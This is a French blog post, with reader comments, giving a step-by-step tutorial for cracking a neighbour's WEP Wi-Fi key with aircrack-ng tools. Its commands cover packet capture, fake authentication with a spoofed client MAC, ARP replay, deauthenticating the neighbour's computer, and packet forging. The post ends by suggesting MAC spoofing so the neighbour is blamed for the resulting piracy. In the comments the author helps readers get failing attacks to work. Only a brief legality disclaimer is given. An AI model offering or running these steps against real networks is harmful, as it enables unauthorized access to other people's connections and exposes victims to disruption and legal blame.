Utiliser Internet de votre voisin comme un nul(l) (WEP)

Je pars ici du principe que vous avez installé et démarré backtrack comme un nul et que vous n’êtes pas assez nul pour imaginer vous connecter à un réseau WIFI sans carte WIFI ou adaptateur USB WIFI.

Maintenant, comme tout nul qui se respecte, ça vous fait une belle jambe parce que de toute façon Linux c’est pour les gros barbus et j’y comprends rien.

Pour une clef WEP, pas besoin de comprendre grand chose, juste suivre un protocole.
Mais comme je vois vos yeux avides de connaissances, je vais tâcher d’expliquer un minimum 🙂

Quand vous allez sur Internet, tout ce qui s’affiche ou que vous téléchargez est en fait contenu dans des milliers de petits messages (un peu comme des courriers postaux) qui sont ensuite remis dans l’ordre par votre ordinateur. Ces messages (comme les courriers) ont une entête (destinataire, expéditeur, date, etc.) et un contenu.

Le problème du WEP c’est que pour certaines demandes, l’entête permet de trouver la clef WEP sans tester toutes les combinaisons (après ça devient vraiment compliqué, mais il n’est pas nécessaire de savoir ça pour pirater le réseau de la mère michou)

Pour pallier ce problème de sécurité, des box internet (Livebox, numericable et consorts) proposent fièrement ce qu’ils appellent le filtrage par adresse MAC.

Oui, mais c’est quoi une adresse MAC? Une adresse MAC c’est un peu comme le numéro de série de votre ordinateur (de votre carte / clef WIFI pour être exact). Par défaut, l’adresse utilisée est celle gravée sur votre carte WIFI, mais vous pouvez tout à fait dire à votre ordinateur d’en utiliser une autre (cette option est un peu cachée sur Windows, j’y reviendrai dans un futur article)

Sur Internet, TOUT a une adresse MAC (Ordinateur, téléphone, box internet, cafetière, réveil, etc.) dès l’instant où quelque chose accède à Internet, il a une adresse MAC. L’adresse MAC d’une box internet est appelée aussi BSSID (Parce que un acronyme ça fait toujours intelligent et ça permet de se faire mousser)

On entre dans le vif du sujet

Ouvrir une console (l’horrible fenêtre noire avec du texte blanc)

Identifier les cartes WIFI utilisables

airmon-ng

Démarrer le mode monitoring d’une carte

airmon-ng start wlan0

Ici, wlan0 est l’identifiant de votre carte WIFI qui vous aura été donné par airmon-ng dans l’étape précédente. Cette étape vous donne l’identifiant d’une nouvelle carte avec le mode monitor activé (mon0 dans la suite)

Trouver des réseaux (WEP)

airodump-ng -t wep mon0

Tapez Ctrl+C une fois que vous avez des BSSID qui apparaissent. Notez le BSSID que vous voulez pirater ainsi que le canal de transmission (Channel)

Une fois le réseau trouvé, redémarrer le mode monitoring sur le channel voulu afin d’avoir un meilleur taux de réussite

airmon-ng stop mon0
airmon-ng start wlan0 11

Ici, 11 est le numéro de canal trouvé plus haut.

Chercher un ordinateur connecté au réseau

airodump-ng -t wep -c 11 -d 00:00:00:00:00:00 mon0

Taper Ctrl+C pour couper l’écoute. 00:00:00:00:00:00 est le BSSID trouvé plus haut. Dans la partie inférieur de la console, vous devriez voir une liste d’ordinateurs connectés, notez leur adresse MAC.

Démarrer l’écoute

airodump-ng -t wep -c 11 -d 00:00:00:00:00:00 -w 00:00:00:00:00:00_save mon0

Ouvrir une autre horrible fenêtre noire avec du texte blanc et laisser tourner l’autre en tâche de fond.

Authentifier son ordinateur sur la box internet

aireplay-ng -1 0 -a 00:00:00:00:00:00 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0

ou si ça ne marche pas :

aireplay-ng -1 6000 -o 1 -q 10 -a 00:00:00:00:00:00 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0

11:11:11:11:11:11 est l’adresse MAC de l’ordinateur connecté au réseau trouvée plus haut.

Ouvrir une autre horrible fenêtre noire avec du texte blanc pour pouvoir lancer une nouvelle authentification dans la console actuelle si un message comme quoi vous avez été déconnecté apparaît par la suite.

Tenter une attaque ARP (si un client est connecté avec un fort trafic => la colonne data monte vite dans la console d’écoute)

aireplay-ng -3 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0

Si au bout de 2-3 minutes vous n’avez toujours pas commencé à émettre (compteur en bas de votre fenêtre noire qui augmente), tentez dans la console laissée à l’étape précédente de déconnecter l’ordinateur de votre voisin (ça ne passe pas inaperçu) :

aireplay-ng -0 0 -a 00:00:00:00:00:00 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0

Tenter Chop-chop ou fragmentation (marche pour les box numéricable par exemple. Pas besoin de fort trafic de la part du client)

Chop-chop :

aireplay-ng -4 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0

Fragmentation :

aireplay-ng -5 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0

Un fichier .xor doit être créé. Avec l’aide de cet obscure fichier, on va être capable de générer un message que comprendra la box Internet (mais dont nous même nous ne connaîtrons pas la teneur). Le but étant ici de générer du trafic Internet chez le voisin.

packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w req_arp

Il ne reste qu’à envoyer en boucle ce message.

aireplay-ng -2 -r req_arp -h 11:11:11:11:11:11 mon0

Pour avoir testé cette méthode, elle est particulièrement efficace et permet réellement de générer du trafic avec un voisin ayant laissé son ordinateur en veille.

Lancer le cassage de la clef une fois que les paquets commencent à être injectés et reconnus par airodump-ng (la première fenêtre, souvenez-vous)

aircrack-ng 00:00:00:00:00:00_save.ivs

Note : il semblerait que ce fichier « .ivs » soit créé uniquement si vous passez l’option « -i » (IVs seulement) à airorump-ng. Si airodump-ng vous a généré un fichier « .cap », vous pouvez le donner à aircrack-ng.

 

Pause café.

Tadaaa! Vous disposez maintenant de la clef WEP de votre voisin !
Il ne vous reste qu’à changer votre adresse MAC sous windows grâce à Windows Mac Changer et vous pourrez faire en sorte que la mère michou reçoive un mail de madame HADOPI!

On dit que les bons hackers peuvent casser une clef WEP en une ou 2 minutes… comptez plutôt 30 minutes si vous débutez (1 heure si vous faites des captures d’écrans en même temps 🙂  )

Et je rappelle : je n’utilisais ici le terme de « voisin » uniquement pour illustrer mon propos, vous ne resterez pas dans la légalité si vous faites de même avec vos voisins « en vrai »

Publicités
À propos

Un informaticien, qui tente de faire comprendre au public que l'informatique n'est pas si compliquée, malgré des acronymes et autres termes obscurs pour faire croire que c'est difficile (et que c'est de votre faute si "ça ne marche pas")

Tagged with: , , , , , , , , , ,
Publié dans Informatique, Piratage, Sans fil
23 comments on “Utiliser Internet de votre voisin comme un nul(l) (WEP)
  1. dreamelf dit :

    « Une fois le réseau trouvé, redémarrer le mode monitoring sur le channel voulu afin d’avoir un meilleur taux de réussite ».
    « airmon-ng start wlan0 11 », ais-je tapé, puisque le canal de ma ligne est 11, mais j’ai eu un message d’erreur me disant que deux applications en cours empêchaient l’exécution de la tâche (je ne me souviens plus du message exact) alors que je n’avais qu’Ubuntu et Backtrack d’ouverts… ça peut venir de quoi ? Merci d’avance !

    • mystcaster dit :

      Bonjour,
      Pour s’assurer qu’aucun processus n’entrave le fonctionnement de airmon-ng, tu peux lancer « airmon-ng check kill » qui va tuer tous les processus risquant d’interférer. (ou « airmon-ng check » si tu veux tuer les processus toi-même)

  2. dreamelf dit :

    à l’étape « Authentifier son ordinateur sur la box internet », les deux lignes de commande rentrées (aireplay-ng -1 0 -a 00:00:00:00:00:00 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0

    ou si ça ne marche pas :

    aireplay-ng -1 6000 -o 1 -q 10 -a 00:00:00:00:00:00 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0) ne donnent rien d’autre que ce message laconique et déprimant : « aireplay-ng –help » for help. Que dois-je faire ? Merci d’avance !

  3. gotgot1995 dit :

    Bonjour à tous ! Pour ma part je suis bloqué vers la fin, lorsqu’il faut utiliser aircrack-ng je tape ça:
    root@bt:~# aircrack-ng replay_src-0728-083924.cap
    et j’obtient ça :

    Aircrack-ng 1.1 r2178

    [00:00:00] Tested 0 keys (got 1 IVs)

    KB depth byte(vote)
    0 255/256 FF( 0) 00( 0) 01( 0) 02( 0) 03( 0)
    1 0/ 7 CC( 256) 00( 0) 01( 0) 02( 0) 03( 0)
    2 0/ 1 81( 256) 00( 0) 01( 0) 02( 0) 03( 0)
    3 0/ 3 80( 256) 00( 0) 01( 0) 02( 0) 03( 0)
    4 0/ 4 68( 256) 00( 0) 01( 0) 02( 0) 03( 0)

    Failed. Next try with 5000 IVs.

    Que dois-je faire ?

    • mystcaster dit :

      Bonjour,

      Il faut attendre. Aircrack te dit qu’il n’a que 1 IV, il t’en faudra quelques milliers pour espérer casser la clef.
      Tu peux laisser Aircrack tourner dans une console pendant que tu injectes les paquets avec aireplay-ng et airodump-ng dans une autre, Aircrack tentera à nouveau de casser la clef lorsqu’il aura 5 000 IVs (puis 10 000, 15 000, etc.)

  4. gotgot1995 dit :

    Bonjour ! Pour ma part, chop-chop n’a pas fonctionné mais la fragmentation si, j’ai donc continué et j’ai envoyé le message en boucle mais lorsque j’utilise la commande « aircrack-ng 00:00:00:00:00:00_save.ivs » il me dis que le fichier n’existe pas ! j’en conclu donc qu’au début du topic il y a une faute à la commande « airodump-ng -t wep -c 11 -d 00:00:00:00:00:00 -w 00:00:00:00:00:00_save mon0 » où il devrait être écrit 00:00:00:00:00:00_save.ivs non ?
    Bref, même en changeant ça, cela n’a pas fonctionné ! :-\
    Quelqu’un aurait-il des suggestions ?

    • mystcaster dit :

      Bonjour,

      L’option -w sert bien à définir un préfixe, l’extension lui sera ajouté par airodump-ng.
      Il se peut que lors de mes exemples, j’ai utilisé l’option « -i » de airodump-ng, me permettant d’enregistrer uniquement les IVs, airodump-ng m’aurait alors créé un fichier avec l’extension « .ivs ».
      Dans le cas où tu n’aurais pas de fichier « .ivs », tu devrais avoir un fichier « .cap » que tu peux aussi donner à aircrack-ng.
      Ce fichier cap contient l’intégralité des paquets échangés, pas uniquement les IVs, il est donc plus gros.

      • Gautier dit :

        J’ai essayé d’utiliser ce fichier .cap en question mais aricrack-ng m’a annoncé qu’il n’y trouvai qu’un fichier IV et qu’il en fallait 5000 :O
        Dans le doute d’avoir mal effectuer ton tutoriel, pourrait tu me préciser quelles sont les consoles à laisser tourner en tache de fond et celle à arrêter (comme airodump-ng au début).
        Merci encore pour le temps que tu prendra à me répondre et bonne fin de journée 😉

      • mystcaster dit :

        Tu dois d’abord lancer airodump-ng (et laisser tourner, c’est ce qui récupère les IVs), puis aireplay-ng (et laisser tourner, c’est ce qui génère les IVs), enfin aircrack-ng (et laisser tourner, c’est ce qui utilise les IVs pour trouver la clef)

        Tu peux varier les attaques avec aireplay-ng si tu vois que ce que tu fais ne génère pas d’IVs. Ça peut être causé par des protections sur le boîtier ADSL. Par exemple, la plupart du temps, tu devras utiliser une adresse MAC d’un ordinateur déjà authentifié au réseau.

        Pour faire court : airodump-ng et aircrack-ng doivent tourner tout le temps, aireplay-ng peut être arrêté / relancé pour varier les attaques et faire monter les IVs plus rapidement.

      • gotgot1995 dit :

        Bon, j’ai laissé les bonne fenêtres ouvertes et j’ai lancé l’ataque ARP qui fonctionne bien étant donné que j’émet beaucoup! J’ai lancé aicrack comme suis et j’obtient ça :
        « root@bt:~# aircrack-ng 38:46:08:DF:0F:9A_save.ivs
        Opening 38:46:08:DF:0F:9A_save.ivs
        open failed: No such file or directory
        Read 0 packets.

        No networks found, exiting.

        Quitting aircrack-ng… »
        Pourtant j’ai bien tapé la commande pour enregistrer le airodump-ng dans un _save.ivs !
        Je désespère.

      • mystcaster dit :

        Bonjour,

        Est-ce que le chiffre dans la colonne que j’ai encadrée sur cette image a bien augmenté ?
        Sinon, tu peux tenter de retirer l’option « -i » et de donner le fichier « .cap » à manger à aircrack… mais ça ne devrait pas changer grand chose.

        Émettre beaucoup ne veut pas dire que tu auras beaucoup d’entêtes exploitables : si le réseau WIFI a un filtrage sur l’adresse MAC, et que tu utilises une adresse MAC qu’il ne reconnait pas, tu ne généreras aucune donnée exploitable.

  5. Armin dit :

    Bonjour,

    Tout d’abord merci pour ce tutoriel fort sympathique. J’ai cependant un petit problème: j’ai bien réussi à récupérer la clé du réseau visé mais je n’arrive pas à m’y connecter alors que je le capte très bien. Linux essaye indéfiniment alors que windos m’annonce après 1/2 seconde qu’il y a un problème.
    Je n’ai pas changer mon adresse mac, serait-ce l’origine du porblème? (j’ai essayé mais j’avoue galérer)

  6. lizoim dit :

    bonsoir, merci pour ce tutoriel. A l’étape « Authentifier son ordinateur sur la box internet », les 2 options de code me renvoie :
    ** Attack was unsuccessful. possible reasons : ** […]

    la puissance du réseau wifi en question n’est pas élevé : pwr : -74
    est-ce qu’une antenne wifi externe me permettrait d’avoir une puissance plus grande ?

    • mystcaster dit :

      Bonjour,

      Je pense plutôt que tu ne dispose pas d’une adresse MAC d’un ordinateur autorisé sur le réseau (étape Chercher un ordinateur connecté au réseau).
      Généralement, les boîtiers ADSL ne répondent même pas à une tentative d’authentification d’un ordinateur inconnu.
      Il faut faire attention car il m’est arrivé d’essayer une adresse MAC d’un ordinateur qui *semblait* être connecté au réseau, mais il s’agissait en fait d’un autre hacker en train de le pirater. 🙂

      • Mone dit :

        « mais il s’agissait en fait d’un autre hacker en train de le pirater »
        Chose complètement impossible à savoir. Pas bien de mentir ! 🙂

      • mystcaster dit :

        C’est ce que j’ai conclu lorsque l’adresse MAC de la machine en question a été rejetée par le point d’accès…
        Lorsque j’ai utilisé une autre adresse MAC connectée, tout a fonctionné à merveille.
        Après c’est sûr que ce n’était peut être pas un pirate, mais toujours est-il qu’il envoyait des messages sur le réseau Wifi sans y être connecté…

  7. liozm dit :

    Bonjour,
    merci pour ce tutoriel.
    j’ai suivit les étapes mais je bloque à l’étape *Authentifier son ordinateur sur la box internet*. il essaie plusieurs tentatives et échoue au bout de 10, puis me propose une liste de causes possible, dont un réseau WIFI trop faible.

    le réseau wifi avec lequel j’ai essayé à une puissance (pwr) de -70 , est-ce trop faible ?
    aussi la puissance sera-t-elle plus élevée avec une carte Wifi externe ? (j’utilise actuellement l’interne d’un portable).

    merci

  8. G-lustre dit :

    Je partais de zéro avant d’essayer… j’y croyais peu.
    Eh bien si : casser une clé WEP peut même se faire en 2 minutes, chrono ! Il suffit d’être familiarisé avec la manip. Ça vaut le coup et ça vient vite, grâce aux explications claires et courtes de chaque commande (merci pour le tutoriel).

    À mon premier cassage, j’étais bouche bée : il m’a suffit de « monitorer » les IVS d’un réseau chargé, afin de déchiffrer son WEP. Jouissif.
    À mon second cassage, j’étais euphorique : j’ai moi-même généré ces IVS sur un réseau vide (par « association » puis « injection »), et voilà !

    Après Une demi douzaine de cassages, je constate qu’il ne m’a jamais fallu plus de 25 000 « data » pour réussir.

    Par contre, puisque BackTrack n’est plus d’actualité, j’ai utilisé Kali Linux (http://www.kali.org/downloads), booté sur une clé USB (grâce à Linux Live USB Creator (http://www.linuxliveusb.com/fr/download). Mais ça fonctionnait aussi très bien sous Ubuntu.

    Par contre, je n’ai pas réussi à faire du monitoring d’IVS sous Windows… j’en rêve. Une solution ?

  9. JoD dit :

    Bonjour capitaine,

    Bon, d’abord, chapeaux bas pour ce site, c’est du boulot et en plus, il est bien fait!

    Les choses sérieuses maintenant! J’arrive comme un nul a faire toutes les étapes, jusqu’à aircrack a qui je donne le fichier .cap à manger car je n’ai pas utiliser l’option « -i ».

    Comme d’autres, il me dit qu’il attend plus d’IVs.

    C’est la que block!

    J’ai bien compris que je devais relancer d’autres attaques avec AirPlay, mais je suis un peu perdu dans le nombre de console ouverte et dans quel console faire quoi?

    De plus, si je lance une autre attaque, donc dans une autre console, le fichier .cap n’a pas le même nom que le premier donner à aircrack!

    Du coup, tout ça me perd…

    Avoir une précision sur quel console utiliser à chaque fois ne serait vraiment pas négligeable…

    Merci d’avance!!!

    • mystcaster dit :

      Bonjour,
      Concrètement, tu devrais avoir 2 (ou 3 consoles) :

      • Une pour airodump-ng (avec une option qui génère des IVs), il faut tâtonner un peu avec les options et/ou les adresses MAC jusqu’à voir les IVs monter rapidement.
      • Une pour aircrack-ng (une fois que airodump-ng génère des IVs rapidement, sinon ça ne sert pas à grand chose)
      • Une dernière optionnelle avec une autre version de airodump-ng pour soutenir la première (réauthentification automatique si le point d’accès nous jette, surveillance du trafic , etc.)

      Si les IVs ne montent pas, ça peut être dû à beaucoup de choses :

      • Tu utilises une adresse MAC d’un ordinateur non reconnu sur le réseau (il faut donc connaître une adresse MAC qui est légitime sur le réseau, pour ça tu peux écouter le trafic quelques temps jusqu’à ce que ton voisin se connecte)
      • La box repère que tu lui envoie un trop grand nombre de requêtes et te jette (il faut alors avoir la 3ème console qui servira à envoyer des requêtes d’authentification toutes les X secondes)
      • La réception WIFI est trop mauvaise, les paquets sont donc perdus ou n’arrivent jamais à la box. Il faut alors changer de place pour améliorer la réception ou changer de carte WIFI/antenne WIFI pour augmenter la puissance du signal.
      • etc.

      Petit rappel : Pirater (ou tenter de pirater) la connexion de son voisin est illégal.

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s

MystCaster
janvier 2012
L M M J V S D
    Août »
 1
2345678
9101112131415
16171819202122
23242526272829
3031  
Catégories
Archives
%d blogueurs aiment cette page :